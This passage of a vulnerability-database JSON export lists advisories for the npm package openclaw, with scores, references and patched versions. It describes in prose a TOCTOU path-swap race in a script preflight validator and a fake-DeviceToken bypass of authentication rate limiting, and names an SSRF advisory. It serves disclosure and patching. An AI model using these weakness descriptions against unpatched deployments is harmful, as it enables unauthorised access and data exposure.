issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43576","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10189","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.10209","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11778","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43576"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"}],"url":"https://github.com/openclaw/openclaw/commit/bc356cc8c2beaa747c71dd86cceab8f804699665"},{"reference_url":"https://github.com/openclaw/openclaw/pull/60469","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/60469"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f7fh-qg34-x2xh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43576","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43576"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url"},{"reference_url":"https://github.com/advisories/GHSA-f7fh-qg34-x2xh","reference_id":"GHSA-f7fh-qg34-x2xh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f7fh-qg34-x2xh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110881?format=json","purl":"pkg:npm/openclaw@2026.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-x1qe-u363-qqaa"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5"}],"aliases":["CVE-2026-43576","GHSA-f7fh-qg34-x2xh"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wyce-qxau-mqff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89271?format=json","vulnerability_id":"VCID-x2ru-ydpv-f3ah","summary":"OpenClaw: TOCTOU read in exec script preflight\n## Summary\n\nOpenClaw's exec script preflight validator previously validated and then read a script by mutable pathname. A local race could swap the path between validation and read, causing preflight analysis to inspect a different file identity than the one that passed the workspace boundary check.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe impact is limited. This was not arbitrary full-file disclosure through the preflight error path. The validator only surfaced derived preflight content, such as a matched token, a line number, or the first non-empty JavaScript line in one branch. Exploitation also required the ability to mutate the relevant workspace path during the preflight window.\n\nStill, this was a real TOCTOU boundary bug in code that is supposed to reason about workspace-local script files before execution. A file identity that passed the initial boundary validation could differ from the identity that was later read for preflight analysis.\n\n## Technical Details\n\nThe vulnerable flow performed separate path validation and file reads in `validateScriptFileForShellBleed`. Because the read was path-based, an attacker with write access to the workspace path could race replacement of the target after validation but before preflight read.\n\n## Fix\n\nPR #62333 replaced the check-then-read flow with a pinned safe-open/read path using the shared `readFileWithinRoot` helper. The fixed path performs boundary verification around the opened file identity and avoids relying on a mutable pathname for the final preflight read. Regression tests cover both pre-open and post-open swap windows.\n\n## Fix Commit(s)\n\n- `b024fae9e5df43e9b69b2daebb72be3469d52e91` (`fix(exec): replace TOCTOU check-then-read with atomic pinned-fd open in script preflight [AI]`)\n- PR: #62333\n\n## Release Process Note\n\nThe fix first shipped in `v2026.4.10`. Users should upgrade to `openclaw` `2026.4.10` or newer; the latest npm release already includes the fix.\n\n## Credits\n\nThanks to @kikayli for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43529","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01547","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02173","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02192","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43529"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62333","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62333"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43529","reference_id":"CVE-2026-43529","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43529"},{"reference_url":"https://github.com/advisories/GHSA-gj9q-8w99-mp8j","reference_id":"GHSA-gj9q-8w99-mp8j","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gj9q-8w99-mp8j"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator","reference_id":"openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43529","GHSA-gj9q-8w99-mp8j"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x2ru-ydpv-f3ah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90206?format=json","vulnerability_id":"VCID-x4hn-ygbg-mkep","summary":"OpenClaw: Fake DeviceToken Bypasses Shared Auth Rate Limiting\n## Summary\nFake DeviceToken Bypasses Shared Auth Rate Limiting\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real in shipped mixed WS auth flow, but practical risk is mostly weak shared-password deployments since strong shared tokens remain non-bruteforceable.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `af0c0862f22ca4492406a3103d05e3628f94cbe9` — 2026-03-31T09:08:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n\nOpenClaw thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard)  for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41333","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23481","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23421","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23468","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41333"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken"},{"reference_url":"https://github.com/advisories/GHSA-6p8r-6m93-557f","reference_id":"GHSA-6p8r-6m93-557f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6p8r-6m93-557f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wq